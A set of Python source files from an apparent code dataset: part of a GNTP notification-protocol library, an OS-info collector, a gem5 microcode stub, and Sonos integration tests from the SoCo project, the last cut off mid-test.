            buff.writeheader('Identifier', resource)
            buff.writeheader('Length', len(data))
            buff.writeln()
            buff.write(data)
            buff.writeln()
            buff.writeln()

        return buff.getvalue()
class GNTPRegister(_GNTPBase):
    """Represents a GNTP Registration Command

    :param string data: (Optional) See decode()
    :param string password: (Optional) Password to use while encoding/decoding messages
    """
    _requiredHeaders = [
        'Application-Name',
        'Notifications-Count'
    ]
    _requiredNotificationHeaders = ['Notification-Name']

    def __init__(self, data=None, password=None):
        _GNTPBase.__init__(self, 'REGISTER')
        # One dict of headers per notification type being registered.
        self.notifications = []

        if data:
            self.decode(data, password)
        else:
            self.set_password(password)
            self.add_header('Application-Name', 'pygntp')
            self.add_header('Notifications-Count', 0)

    def validate(self):
        '''Validate required registration headers and the headers of every
        registered notification type.'''
        for header in self._requiredHeaders:
            if not self.headers.get(header, False):
                raise errors.ParseError('Missing Registration Header: ' + header)
        for notice in self.notifications:
            for header in self._requiredNotificationHeaders:
                if not notice.get(header, False):
                    raise errors.ParseError('Missing Notification Header: ' + header)

    def decode(self, data, password):
        """Decode existing GNTP Registration message

        :param string data: Message to decode
        """
        self.raw = gntp.shim.u(data)
        parts = self.raw.split('\r\n\r\n')
        self.info = self._parse_info(self.raw)
        self._validate_password(password)
        self.headers = self._parse_dict(parts[0])

        # Remaining blocks are either notification-type headers or binary
        # resource identifiers.
        for i, part in enumerate(parts):
            if i == 0:
                continue  # Skip Header
            if part.strip() == '':
                continue
            notice = self._parse_dict(part)
            if notice.get('Notification-Name', False):
                self.notifications.append(notice)
            elif notice.get('Identifier', False):
                notice['Data'] = self._decode_binary(part, notice)
                #open('register.png','wblol').write(notice['Data'])
                self.resources[notice.get('Identifier')] = notice

    def add_notification(self, name, enabled=True):
        """Add new Notification to Registration message

        :param string name: Notification Name
        :param boolean enabled: Enable this notification by default
        """
        notice = {}
        notice['Notification-Name'] = name
        notice['Notification-Enabled'] = enabled

        self.notifications.append(notice)
        # Keep the count header in sync with the notification list.
        self.add_header('Notifications-Count', len(self.notifications))

    def encode(self):
        """Encode a GNTP Registration Message

        :return string: Encoded GNTP Registration message. Returned as a byte string
        """
        buff = _GNTPBuffer()
        buff.writeln(self._format_info())

        #Headers
        for k, v in self.headers.items():
            buff.writeheader(k, v)
        buff.writeln()

        #Notifications
        if len(self.notifications) > 0:
            for notice in self.notifications:
                for k, v in notice.items():
                    buff.writeheader(k, v)
                buff.writeln()

        #Resources
        for resource, data in self.resources.items():
            buff.writeheader('Identifier', resource)
            buff.writeheader('Length', len(data))
            buff.writeln()
            buff.write(data)
            buff.writeln()
            buff.writeln()

        return buff.getvalue()
class GNTPNotice(_GNTPBase):
    """Represents a GNTP Notification Command

    :param string data: (Optional) See decode()
    :param string app: (Optional) Set Application-Name
    :param string name: (Optional) Set Notification-Name
    :param string title: (Optional) Set Notification Title
    :param string password: (Optional) Password to use while encoding/decoding messages
    """
    _requiredHeaders = [
        'Application-Name',
        'Notification-Name',
        'Notification-Title'
    ]

    def __init__(self, data=None, app=None, name=None, title=None, password=None):
        _GNTPBase.__init__(self, 'NOTIFY')

        if data:
            self.decode(data, password)
        else:
            self.set_password(password)
            if app:
                self.add_header('Application-Name', app)
            if name:
                self.add_header('Notification-Name', name)
            if title:
                self.add_header('Notification-Title', title)

    def decode(self, data, password):
        """Decode existing GNTP Notification message

        :param string data: Message to decode.
        """
        self.raw = gntp.shim.u(data)
        parts = self.raw.split('\r\n\r\n')
        self.info = self._parse_info(self.raw)
        self._validate_password(password)
        self.headers = self._parse_dict(parts[0])

        # Remaining blocks can only be binary resource identifiers.
        for i, part in enumerate(parts):
            if i == 0:
                continue  # Skip Header
            if part.strip() == '':
                continue
            notice = self._parse_dict(part)
            if notice.get('Identifier', False):
                notice['Data'] = self._decode_binary(part, notice)
                #open('notice.png','wblol').write(notice['Data'])
                self.resources[notice.get('Identifier')] = notice
class GNTPSubscribe(_GNTPBase):
    """Represents a GNTP Subscribe Command

    :param string data: (Optional) See decode()
    :param string password: (Optional) Password to use while encoding/decoding messages
    """
    _requiredHeaders = [
        'Subscriber-ID',
        'Subscriber-Name',
    ]

    def __init__(self, data=None, password=None):
        _GNTPBase.__init__(self, 'SUBSCRIBE')
        if data is None:
            # Build a fresh message, optionally secured with a password.
            self.set_password(password)
        else:
            # Parse (and authenticate) an existing on-the-wire message.
            self.decode(data, password)
class GNTPOK(_GNTPBase):
    """Represents a GNTP OK Response

    :param string data: (Optional) See _GNTPResponse.decode()
    :param string action: (Optional) Set type of action the OK Response is for
    """
    _requiredHeaders = ['Response-Action']

    def __init__(self, data=None, action=None):
        _GNTPBase.__init__(self, '-OK')
        if data is not None:
            self.decode(data)
        if action is not None:
            self.add_header('Response-Action', action)
class GNTPError(_GNTPBase):
    """Represents a GNTP Error response

    :param string data: (Optional) See _GNTPResponse.decode()
    :param string errorcode: (Optional) Error code
    :param string errordesc: (Optional) Error Description
    """
    _requiredHeaders = ['Error-Code', 'Error-Description']

    def __init__(self, data=None, errorcode=None, errordesc=None):
        _GNTPBase.__init__(self, '-ERROR')
        if data is not None:
            self.decode(data)
        if errorcode is not None:
            self.add_header('Error-Code', errorcode)
            self.add_header('Error-Description', errordesc)

    def error(self):
        """Return the ``(code, description)`` pair from the headers."""
        code = self.headers.get('Error-Code', None)
        description = self.headers.get('Error-Description', None)
        return (code, description)
def parse_gntp(data, password=None):
    """Attempt to parse a message as a GNTP message

    :param string data: Message to be parsed
    :param string password: Optional password to be used to verify the message
    """
    data = gntp.shim.u(data)
    match = GNTP_INFO_LINE_SHORT.match(data)
    if not match:
        raise errors.ParseError('INVALID_GNTP_INFO')
    messagetype = match.groupdict()['messagetype']
    # Dispatch to the message class matching the type on the info line.
    if messagetype == 'REGISTER':
        return GNTPRegister(data, password=password)
    if messagetype == 'NOTIFY':
        return GNTPNotice(data, password=password)
    if messagetype == 'SUBSCRIBE':
        return GNTPSubscribe(data, password=password)
    if messagetype == '-OK':
        return GNTPOK(data)
    if messagetype == '-ERROR':
        return GNTPError(data)
    raise errors.ParseError('INVALID_GNTP_MESSAGE')
| gpl-3.0 |
hackshel/metaCollecter | src/meta/modules/mod_linux_osinfo.py | 1 | 1138 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import re
class State(object):
    """Collect basic OS metadata for a RedHat-family Linux host.

    :param args: an ``os.uname()``-style 5-tuple
                 ``(sysname, nodename, release, version, machine)``.
                 Defaults to the live ``os.uname()`` result.
    """

    def __init__(self, args=None):
        # BUG FIX: previously ``self.args`` was never assigned when no
        # args were given, so ``get()`` raised AttributeError. Default to
        # the running host's uname information instead.
        if not args:
            args = os.uname()
        self.args = list(args)
        # RedHat-family distributions record their release string here.
        self.rel = '/etc/redhat-release'
        # Matches a leading version number such as "6" or "6.5".
        self.verRe = re.compile("^(\d+(\.\d+)?)")

    def getRelease(self):
        """Return ``[distro_name, version]`` parsed from the release file."""
        # Use a context manager so the file is closed even on error.
        with open(self.rel) as fp:
            c = fp.readlines()
        if c[0] != '':
            line = c[0].split()
        r = []
        r.append(line[0].strip())
        for x in line:
            version = self.verRe.search(x)
            if version:
                r.append(version.groups()[0])
                break
        return r

    def get(self):
        """Return a dict of ``os_*`` metadata fields for this host."""
        res = {}
        release = self.getRelease()
        res['os_type'] = self.args[0]
        res['os_kernel'] = self.args[2]
        res['os_platform'] = self.args[4]
        res['os_release'] = release[0]
        res['os_version'] = release[1]
        res['os_hostname'] = self.args[1]
        return res
if __name__ == '__main__':
    # Ad-hoc smoke test (Python 2): print this host's OS information.
    o = State( os.uname() )
    print o.get()
| bsd-3-clause |
rallylee/gem5 | src/arch/x86/isa/insts/x87/compare_and_test/classify.py | 91 | 2149 | # Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
# FXAM (classify the value in ST(0)) has no microcode implementation yet;
# this placeholder keeps only the instruction name as a comment.
microcode = '''
# FXAM
'''
| bsd-3-clause |
KennethNielsen/SoCo | tests/test_integration.py | 1 | 36566 | # -*- coding: utf-8 -*-
# pylint: disable-msg=too-few-public-methods, redefined-outer-name, no-self-use
"""This file contains the classes used to perform integration tests on the
methods in the SoCo class. They access a real Sonos system.
PLEASE TAKE NOTE: All of these tests are designed to run on a Sonos system
without interfering with normal service. This means that they must not raise
the volume or must leave the player in the same state as they found it in. They
have been made this way since SoCo is developed by volunteers who in all
likelihood do not have a dedicated test system. Accordingly the tests must not
annoy the neighbors, and should return the system to its original state so that
the developers can listen to their music while coding, without having it
interrupted at every unit test!
PLEASE RESPECT THIS.
"""
from __future__ import unicode_literals
import time
import pytest
import soco as soco_module
from soco.data_structures import (
DidlMusicTrack,
DidlPlaylistContainer,
SearchResult,
)
from soco.music_library import MusicLibrary
from soco.exceptions import SoCoUPnPException
# Mark all tests in this module with the pytest custom "integration" marker so
# they can be selected or deselected as a whole, eg:
# py.test -m "integration"
# or
# py.test -m "no integration"
pytestmark = pytest.mark.integration
@pytest.yield_fixture(scope="session")
def soco(request):
    """Set up and tear down the soco fixture used by all tests.

    Reads the player IP from the ``--ip`` command line option, requires
    the device to be PLAYING with a non-empty queue, and restores the
    queue, current track and playback position after the session.
    """
    # Get the ip address from the command line, and create the soco object
    # Only one is used per test session, hence the decorator
    ip = request.config.option.IP
    if ip is None:
        pytest.fail("No ip address specified. Use the --ip option.")
    soco_instance = soco_module.SoCo(ip)
    # Check the device is playing and has items in the queue
    if len(soco_instance.get_queue()) == 0:
        pytest.fail(
            "Integration tests on the SoCo class must be run "
            "with at least 1 item in the playlist."
        )
    transport_info = soco_instance.get_current_transport_info()
    if transport_info["current_transport_state"] != "PLAYING":
        pytest.fail(
            "Integration tests on the SoCo class must be run "
            "with the Sonos unit playing."
        )
    # Save the device's state
    state = {
        "queue": soco_instance.get_queue(0, 1000),
        "current_track_info": soco_instance.get_current_track_info(),
    }
    # Yield the device to the test function
    yield soco_instance
    # Tear down. Restore state
    soco_instance.stop()
    soco_instance.clear_queue()
    for track in state["queue"]:
        soco_instance.add_to_queue(track)
    # playlist_position is 1-based; play_from_queue takes a 0-based index.
    soco_instance.play_from_queue(
        int(state["current_track_info"]["playlist_position"]) - 1
    )
    soco_instance.seek(state["current_track_info"]["position"])
    soco_instance.play()
def wait(interval=0.1):
    """Pause for ``interval`` seconds (default 0.1).

    Used between Sonos commands to give the device time to settle;
    adjusting the default here tunes all tests at once.
    """
    time.sleep(interval)
class TestVolume(object):
    """Integration tests for the volume property."""

    valid_values = range(101)

    @pytest.yield_fixture(autouse=True)
    def restore_volume(self, soco):
        """A fixture which restores volume after each test in the class is
        run."""
        old = soco.volume
        yield
        soco.volume = old
        wait()

    def test_get_and_set(self, soco):
        """Test if the set functionality works when given valid arguments."""
        old = soco.volume
        assert old in self.valid_values
        if old == self.valid_values[0]:
            new = old + 1
        else:
            new = old - 1
        soco.volume = new
        wait()
        assert soco.volume == new

    def test_invalid_arguments(self, soco):
        """Test if the set functionality coerces into range when given
        integers outside of the allowed range."""
        # NOTE We don't test coerce from too large values, since that would
        # put the unit at full volume
        soco.volume = self.valid_values[0] - 1
        wait()
        assert soco.volume == 0

    def test_set_0(self, soco):
        """Test whether the volume can be set to 0. Regression test for:

        https://github.com/rahims/soco/issues/29
        """
        # BUG FIX: the ``soco`` fixture argument was missing, so the old
        # test assigned an attribute to the module-level fixture *function*
        # instead of talking to the player, and passed vacuously.
        soco.volume = 0
        wait()
        assert soco.volume == 0
class TestBass(object):
    """Integration tests for the bass property.

    This class implements a full boundary value test.
    """

    valid_values = range(-10, 11)

    @pytest.yield_fixture(autouse=True)
    def restore_bass(self, soco):
        """Restore the bass EQ setting after each test in this class."""
        saved = soco.bass
        yield
        soco.bass = saved
        wait()

    def test_get_and_set(self, soco):
        """Boundary values of the valid range must round-trip exactly."""
        assert soco.bass in self.valid_values
        lower, upper = self.valid_values[0], self.valid_values[-1]
        for level in (lower, upper):
            soco.bass = level
            wait()
            assert soco.bass == level

    def test_invalid_arguments(self, soco):
        """Out-of-range values must be coerced to the nearest boundary."""
        lower, upper = self.valid_values[0], self.valid_values[-1]
        soco.bass = lower - 1
        wait()
        assert soco.bass == lower
        soco.bass = upper + 1
        wait()
        assert soco.bass == upper
class TestTreble(object):
    """Integration tests for the treble property.

    This class implements a full boundary value test.
    """

    valid_values = range(-10, 11)

    @pytest.yield_fixture(autouse=True)
    def restore_treble(self, soco):
        """Restore the treble EQ setting after each test in this class."""
        saved = soco.treble
        yield
        soco.treble = saved
        wait()

    def test_get_and_set(self, soco):
        """Boundary values of the valid range must round-trip exactly."""
        assert soco.treble in self.valid_values
        lower, upper = self.valid_values[0], self.valid_values[-1]
        for level in (lower, upper):
            soco.treble = level
            wait()
            assert soco.treble == level

    def test_invalid_arguments(self, soco):
        """Out-of-range values must be coerced to the nearest boundary."""
        lower, upper = self.valid_values[0], self.valid_values[-1]
        soco.treble = lower - 1
        wait()
        assert soco.treble == lower
        soco.treble = upper + 1
        wait()
        assert soco.treble == upper
class TestMute(object):
    """Integration test for the mute property."""

    def test(self, soco):
        """Toggle mute on and back off, verifying each transition."""
        initial = soco.mute
        assert initial is False, (
            "The unit should not be muted when running the unit tests."
        )
        soco.mute = True
        wait()
        assert soco.mute is True
        soco.mute = False
        wait()
        assert soco.mute is False
class TestGetCurrentTransportInfo(object):
    """Integration test for the get_current_transport_info method."""

    # Keep this list in sync with the keys named in the test docstring.
    transport_info_keys = sorted(
        [
            "current_transport_status",
            "current_transport_state",
            "current_transport_speed",
        ]
    )

    def test(self, soco):
        """The method must return a dict whose keys are exactly
        current_transport_status, current_transport_state and
        current_transport_speed, each mapped to a non-None value."""
        transport_info = soco.get_current_transport_info()
        assert isinstance(transport_info, dict)
        assert sorted(transport_info.keys()) == self.transport_info_keys
        assert all(value is not None for value in transport_info.values())
class TestTransport(object):
    """Integration tests for transport methods (play, pause etc)."""

    def test_pause_and_play(self, soco):
        """Pausing then resuming must be reflected in the transport state."""
        soco.pause()
        wait(1)
        state = soco.get_current_transport_info()["current_transport_state"]
        assert state == "PAUSED_PLAYBACK"
        soco.play()
        wait(1)
        state = soco.get_current_transport_info()["current_transport_state"]
        assert state == "PLAYING"

    def test_stop(self, soco):
        """Stopping then resuming must be reflected in the transport state."""
        soco.stop()
        wait(1)
        state = soco.get_current_transport_info()["current_transport_state"]
        assert state == "STOPPED"
        soco.play()
        wait(1)
        state = soco.get_current_transport_info()["current_transport_state"]
        assert state == "PLAYING"

    def test_seek_valid(self, soco):
        """Seeking with both accepted time-string formats must work."""
        original_position = soco.get_current_track_info()["position"]
        # Format 1: H:MM:SS
        soco.seek("0:00:00")
        wait()
        assert soco.get_current_track_info()["position"] in ["0:00:00", "0:00:01"]
        # Reset, then format 2: HH:MM:SS
        soco.seek(original_position)
        soco.seek("00:00:00")
        wait()
        assert soco.get_current_track_info()["position"] in ["0:00:00", "0:00:01"]
        # Clean up
        soco.seek(original_position)
        wait()

    def test_seek_invald(self, soco):
        """Seeking with malformed time strings must raise ValueError."""
        for malformed in ["invalid_time_string", "5:12", "6", "aa:aa:aa"]:
            with pytest.raises(ValueError):
                soco.seek(malformed)
class TestGetCurrentTrackInfo(object):
    """Integration test for the get_current_track_info method."""

    # Keep in sync with the keys named in the test docstring.
    info_keys = sorted(
        [
            "album",
            "artist",
            "title",
            "uri",
            "metadata",
            "playlist_position",
            "duration",
            "album_art",
            "position",
        ]
    )

    def test_get(self, soco):
        """The method must return a dict whose keys are exactly: album,
        artist, title, uri, metadata, playlist_position, duration,
        album_art and position."""
        track_info = soco.get_current_track_info()
        assert isinstance(track_info, dict)
        assert sorted(track_info.keys()) == self.info_keys
class TestGetSpeakerInfo(object):
    """Integration test for the get_speaker_info method."""

    # The values in this list must be kept up to date with the values in
    # the test doc string
    info_keys = sorted(
        [
            "zone_name",
            "zone_icon",
            "uid",
            "serial_number",
            "software_version",
            "hardware_version",
            "mac_address",
        ]
    )

    def test(self, soco):
        """Test if the return value is a dictionary that contains the keys:
        zone_name, zone_icon, uid, serial_number, software_version,
        hardware_version, mac_address

        and that values have been found for all keys, i.e. they are not None.
        """
        speaker_info = soco.get_speaker_info()
        assert isinstance(speaker_info, dict)
        # BUG FIX: ``info_keys`` was defined but never checked, despite the
        # docstring's claim. Assert each documented key is present (the
        # device may legitimately return extra keys, so no exact match).
        for key in self.info_keys:
            assert key in speaker_info
        for _, value in speaker_info.items():
            assert value is not None
# TODO: test GetSpeakersIp
class TestGetQueue(object):
    """Integration test for the get_queue method."""

    # Keep in sync with the attributes checked in test_get below.
    queue_element_keys = sorted(
        ["album", "creator", "resources", "album_art_uri", "title"]
    )

    def test_get(self, soco):
        """get_queue must return a list of DidlMusicTrack objects, each
        with truthy album, creator, resources, album_art_uri and title
        attributes."""
        queue = soco.get_queue(0, 100)
        assert isinstance(queue, list)
        for track in queue:
            assert isinstance(track, DidlMusicTrack)
            for attribute in self.queue_element_keys:
                assert getattr(track, attribute)
class TestAddToQueue(object):
    """Integration test for the add_to_queue method."""

    def test_add_to_queue(self, soco):
        """Re-add the last queue item, then verify the queue grew by one
        and now ends with two identical tracks."""
        old_queue = soco.get_queue(0, 1000)
        # add_to_queue returns the new item's 1-based queue position.
        assert soco.add_to_queue(old_queue[-1]) == len(old_queue) + 1
        wait()
        new_queue = soco.get_queue()
        assert len(new_queue) == len(old_queue) + 1
        assert new_queue[-1].title == new_queue[-2].title
class TestRemoveFromQueue(object):
    """Integration test for the remove_from_queue method."""

    def test(self, soco):
        """Removing the last item must shrink the queue by exactly one."""
        old_queue = soco.get_queue()
        soco.remove_from_queue(len(old_queue) - 1)  # queue index is 0 based
        wait()
        new_queue = soco.get_queue()
        assert new_queue != old_queue, (
            "No difference between queues before and after removing "
            "the last item"
        )
        assert len(new_queue) == len(old_queue) - 1
class TestSonosPlaylist(object):
    """Integration tests for Sonos Playlist Management."""

    # Cached on first fixture run so the device is only queried once.
    existing_playlists = None
    # Reserved name; tests abort if the device already has a playlist
    # with this title to avoid clobbering user data.
    playlist_name = "zSocoTestPlayList42"

    @pytest.yield_fixture(autouse=True)
    def restore_sonos_playlists(self, soco):
        """A fixture which cleans up after each sonos playlist test."""
        if self.existing_playlists is None:
            self.existing_playlists = soco.get_sonos_playlists()
        if self.playlist_name in [x.title for x in self.existing_playlists]:
            msg = "%s is an existing playlist." % self.playlist_name
            pytest.fail(msg)

        yield
        # Remove any playlist a test created under the reserved name.
        for sonos_playlist in soco.get_sonos_playlists():
            if sonos_playlist.title == self.playlist_name:
                soco.remove_sonos_playlist(sonos_playlist=sonos_playlist)

    def test_create(self, soco):
        """Test creating a new empty Sonos playlist."""
        existing_playlists = {x.item_id for x in soco.get_sonos_playlists()}
        new_playlist = soco.create_sonos_playlist(title=self.playlist_name)
        assert type(new_playlist) is DidlPlaylistContainer
        new_pl = {x.item_id for x in soco.get_sonos_playlists()}
        assert new_pl != existing_playlists
        # Exactly one new playlist id should have appeared.
        assert new_pl - existing_playlists == {new_playlist.item_id}

    def test_create_from_queue(self, soco):
        """Test creating a Sonos playlist from the current queue."""
        playlist = soco.create_sonos_playlist_from_queue(self.playlist_name)
        assert type(playlist) is DidlPlaylistContainer
        prslt = soco.music_library.browse(ml_item=playlist)
        qrslt = soco.get_queue()
        assert len(prslt) == len(qrslt)
        assert prslt.total_matches == qrslt.total_matches
        assert prslt.number_returned == qrslt.number_returned
        # compare uri because item_id is different, SQ:xx/n for playlist
        for p_item, q_item in zip(prslt, qrslt):
            assert p_item.resources[0].uri == q_item.resources[0].uri

    def test_remove_playlist(self, soco):
        """Test removing a Sonos playlist."""
        # a place holder, remove_sonos_playlist is exercised in the
        # 'restore_sonos_playlists'
        pass

    def test_remove_playlist_itemid(self, soco):
        """Test removing a Sonos playlist by item_id."""
        new_playlist = soco.create_sonos_playlist(title=self.playlist_name)
        assert type(new_playlist) is DidlPlaylistContainer
        assert soco.remove_sonos_playlist(new_playlist.item_id)
        found = False
        for sonos_playlist in soco.get_sonos_playlists():
            if sonos_playlist.title == self.playlist_name:
                found = True
                break
        assert found is False, "new_playlist was not removed by item_id"

    def test_remove_playlist_bad_id(self, soco):
        """Test attempting to remove a Sonos playlist using a bad id."""
        # junky bad
        with pytest.raises(SoCoUPnPException):
            soco.remove_sonos_playlist("SQ:-7")
        # realistic non-existing: one past the highest existing SQ number
        playlists = soco.get_sonos_playlists()
        # Accommodate the case of no existing playlists
        if len(playlists) == 0:
            hpl_i = 0
        else:
            hpl_i = max([int(x.item_id.split(":")[1]) for x in playlists])
        with pytest.raises(SoCoUPnPException):
            soco.remove_sonos_playlist("SQ:{}".format(hpl_i + 1))
class TestTimer(object):
    """Integration tests for sleep timers on Sonos."""

    existing_timer = None

    @pytest.yield_fixture(autouse=True)
    def restore_timer(self, soco):
        """A fixture which restores the sleep timer after each test."""
        existing_timer = soco.get_sleep_timer()
        yield
        soco.set_sleep_timer(existing_timer)

    def test_get_set_timer(self, soco):
        """Test setting and reading back the sleep timer."""
        assert soco.set_sleep_timer(7200) is None
        result = soco.get_sleep_timer()
        # Allow a couple of seconds of slack for the round trip.
        if not any(result == s for s in [7200, 7199, 7198]):
            # BUG FIX: ``result`` is compared as a plain number above, so
            # the old ``result["RemainingSleepTimerDuration"]`` indexing
            # raised TypeError instead of producing this failure message.
            pytest.fail(
                "Set timer to 7200, but sonos reports back time as %s" % result
            )
class TestReorderSonosPlaylist(object):
    """Integration tests for Sonos Playlist Management (reordering and
    removing tracks in a saved Sonos playlist)."""

    existing_playlists = None
    playlist_name = "zSocoTestPlayList42"
    test_playlist = None
    queue_length = None

    @pytest.yield_fixture(autouse=True, scope="class")
    def restore_sonos_playlists(self, soco):
        """A class-scoped fixture which creates the shared test playlist
        from the current queue and destroys it once all tests have run."""
        if self.existing_playlists is None:
            self.existing_playlists = soco.get_sonos_playlists()
            if self.playlist_name in [x.title for x in self.existing_playlists]:
                msg = "%s is an existing playlist." % self.playlist_name
                pytest.fail(msg)
        queue_list = soco.get_queue()
        # FIX: several tests below address track index 2, so at least three
        # queued items are required.  The old check of "< 2" contradicted
        # its own failure message and let a two-item queue through.
        if len(queue_list) < 3:
            msg = "You must have 3 or more items in your queue for testing."
            pytest.fail(msg)
        playlist = soco.create_sonos_playlist_from_queue(self.playlist_name)
        self.__class__.queue_length = soco.queue_size
        self.__class__.test_playlist = playlist
        yield
        soco.contentDirectory.DestroyObject([("ObjectID", self.test_playlist.item_id)])

    def _reset_spl_contents(self, soco):
        """Ensure test playlist matches queue for each test."""
        soco.contentDirectory.DestroyObject([("ObjectID", self.test_playlist.item_id)])
        playlist = soco.create_sonos_playlist_from_queue(self.playlist_name)
        self.__class__.test_playlist = playlist
        return playlist, self.__class__.queue_length

    def test_reverse_track_order(self, soco):
        """Test reversing the tracks in the Sonos playlist."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        tracks = ",".join([str(x) for x in reversed(range(num_tracks))])
        new_pos = ",".join([str(x) for x in range(num_tracks)])
        args = {
            "sonos_playlist": test_playlist.item_id,
            "tracks": tracks,
            "new_pos": new_pos,
        }
        response = soco.reorder_sonos_playlist(**args)
        assert response["change"] == 0
        assert response["length"] == num_tracks
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        for s_item, q_item in zip(spl, reversed(soco.get_queue())):
            assert s_item.resources[0].uri == q_item.resources[0].uri

    def test_swap_first_two_items(self, soco):
        """Test a use case in doc string. Swapping the positions of the first
        two tracks in the Sonos playlist."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        tracks = [0]
        new_pos = [1]
        args = {
            "sonos_playlist": test_playlist.item_id,
            "tracks": tracks,
            "new_pos": new_pos,
        }
        response = soco.reorder_sonos_playlist(**args)
        assert response["change"] == 0
        assert response["length"] == num_tracks
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        que = soco.get_queue()
        assert spl[0].resources[0].uri == que[1].resources[0].uri
        assert spl[1].resources[0].uri == que[0].resources[0].uri
        # FIXME remove the list on spl and que before slicing, when
        # the deprecated __getitem__ on ListOfMusicInfoItems is
        # removed
        for s_item, q_item in zip(list(spl)[2:], list(que)[2:]):
            assert s_item.resources[0].uri == q_item.resources[0].uri

    def test_remove_first_track(self, soco):
        """Test removing first track from Sonos Playlist."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        tracks = [0]
        new_pos = [None]
        args = {
            "sonos_playlist": test_playlist.item_id,
            "tracks": tracks,
            "new_pos": new_pos,
        }
        response = soco.reorder_sonos_playlist(**args)
        assert response["change"] == -1
        assert response["length"] == num_tracks - 1
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        # FIXME remove the list on queue() call, when the deprecated
        # __getitem__ on ListOfMusicInfoItems is removed
        que = list(soco.get_queue())[1:]
        for s_item, q_item in zip(spl, que):
            assert s_item.resources[0].uri == q_item.resources[0].uri

    def test_remove_first_track_full(self, soco):
        """Test removing first track from Sonos Playlist, expressing the
        full position list instead of a single-element shorthand."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        tracks = [0] + list(range(num_tracks - 1))  # [0, 0, 1, ..., n-1]
        new_pos = [None] + list(range(num_tracks - 1))  # [None, 0, ..., n-1]
        args = {
            "sonos_playlist": test_playlist.item_id,
            "tracks": tracks,
            "new_pos": new_pos,
        }
        response = soco.reorder_sonos_playlist(**args)
        assert response["change"] == -1
        assert response["length"] == num_tracks - 1
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        # FIXME remove the list on queue() call, when the deprecated
        # __getitem__ on ListOfMusicInfoItems is removed
        que = list(soco.get_queue())[1:]
        for s_item, q_item in zip(spl, que):
            assert s_item.resources[0].uri == q_item.resources[0].uri

    def test_remove_last_track(self, soco):
        """Test removing last track from Sonos Playlist."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        tracks = range(num_tracks)
        new_pos = list(range(num_tracks - 1)) + [None]
        args = {
            "sonos_playlist": test_playlist.item_id,
            "tracks": tracks,
            "new_pos": new_pos,
        }
        response = soco.reorder_sonos_playlist(**args)
        assert response["change"] == -1
        assert response["length"] == num_tracks - 1
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        # FIXME remove the list on queue() call, when the deprecated
        # __getitem__ on ListOfMusicInfoItems is removed
        que = list(soco.get_queue())[:-1]
        for s_item, q_item in zip(spl, que):
            assert s_item.resources[0].uri == q_item.resources[0].uri

    def test_remove_between_track(self, soco):
        """Test removing a middle track from Sonos Playlist."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        ndx = int(num_tracks / 2)
        tracks = [ndx]
        new_pos = [None]
        args = {
            "sonos_playlist": test_playlist.item_id,
            "tracks": tracks,
            "new_pos": new_pos,
        }
        response = soco.reorder_sonos_playlist(**args)
        assert response["change"] == -1
        assert response["length"] == num_tracks - 1
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        que = soco.get_queue()
        del que[ndx]
        for s_item, q_item in zip(spl, que):
            assert s_item.resources[0].uri == q_item.resources[0].uri

    def test_remove_some_tracks(self, soco):  # pylint: disable=R0914
        """Test removing some tracks from Sonos Playlist."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        # get rid of the even numbered tracks; descending order so that
        # deletions do not shift the indices still to be removed
        tracks = sorted([x for x in range(num_tracks) if not x & 1], reverse=True)
        new_pos = [None for _ in tracks]
        args = {
            "sonos_playlist": test_playlist.item_id,
            "tracks": tracks,
            "new_pos": new_pos,
        }
        response = soco.reorder_sonos_playlist(**args)
        assert response["change"] == -1 * len(new_pos)
        assert response["length"] == num_tracks + response["change"]
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        que = soco.get_queue()
        for ndx in tracks:
            del que[ndx]
        for s_item, q_item in zip(spl, que):
            assert s_item.resources[0].uri == q_item.resources[0].uri

    def test_remove_all_tracks(self, soco):
        """Test removing all tracks from Sonos Playlist."""
